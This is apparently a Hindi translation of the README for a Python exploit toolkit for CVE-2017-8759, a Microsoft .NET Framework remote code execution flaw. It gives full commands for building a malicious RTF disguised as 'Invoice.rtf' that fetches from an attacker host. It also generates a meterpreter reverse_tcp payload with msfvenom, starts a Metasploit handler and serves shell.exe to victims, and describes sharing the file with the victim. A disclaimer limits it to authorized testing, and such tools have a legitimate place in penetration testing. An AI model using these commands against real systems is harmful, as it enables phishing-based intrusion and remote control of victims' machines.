
Exploit toolkit CVE-2017-8759 - v1.0 एक उपयोगी python स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकती है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित तक metasploit / meterpreter / अन्य पेलोड पहुँचा सकती है।
CVE-2017-8759 एक्सप्लॉइट टूलकिट - v1.0 एक उपयोगी Python स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का त्वरित और प्रभावी तरीके से परीक्षण करने की सुविधा प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकती है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित को metasploit / meterpreter / अन्य पेलोड वितरित कर सकती है।
यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।
अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका बुरे कामों के लिए उपयोग न करें!
CC BY 4.0 लाइसेंस - https://creativecommons.org/licenses/by/4.0/
स्क्रिप्ट में निम्नलिखित क्षमताएँ शामिल की गईं
संस्करण: Python संस्करण 2.7.13
1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं) : Metasploit पेलोड उत्पन्न करें और हैंडलर शुरू करें
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) स्थानीय पेलोड वितरित करने के लिए टूलकिट को शोषण मोड में शुरू करें
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
यह CVE-2017-8759 (Microsoft .NET Framework RCE) का शोषण करने के लिए एक उपयोगी टूलकिट है।
मोड:
-M gen केवल दुर्भावनापूर्ण फ़ाइल उत्पन्न करें
दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें:
-w <Filename.rtf> दुर्भावनापूर्ण RTF फ़ाइल का नाम (यह फ़ाइल पीड़ित के साथ साझा करें)।
-u <http://attacker.com/test.txt> रिमोट txt फ़ाइल का पथ। सामान्यतः, यह एक डोमेन या IP होना चाहिए जहाँ यह टूल चल रहा है।
उदाहरण के लिए, http://attackerip.com/test.txt (यह URL दुर्भावनापूर्ण RTF फ़ाइल में शामिल किया जाएगा और पीड़ित द्वारा दुर्भावनापूर्ण RTF फ़ाइल खोलने पर अनुरोध किया जाएगा)।
-M exp शोषण मोड शुरू करें
शोषण:
-p <TCP port:Default 80> स्थानीय पोर्ट नंबर।
-e <http://attacker.com/shell.exe> एक निष्पादन योग्य फ़ाइल / meterpreter शेल / पेलोड का पथ जिसे लक्ष्य पर निष्पादित किया जाना है।
-l </tmp/shell.exe> एक निष्पादन योग्य फ़ाइल / meterpreter शेल / पेलोड का स्थानीय पथ निर्दिष्ट करें।
@bhdresh
@Voulnet, @vysec, @bhdresh
स्पष्ट रूप से, मैं पूर्णकालिक डेवलपर नहीं हूँ, इसलिए कुछ रुकावटों की उम्मीद करें
कृपया बग और समस्याएँ https://github.com/bhdresh/CVE-2017-8759/issues/new पर रिपोर्ट करें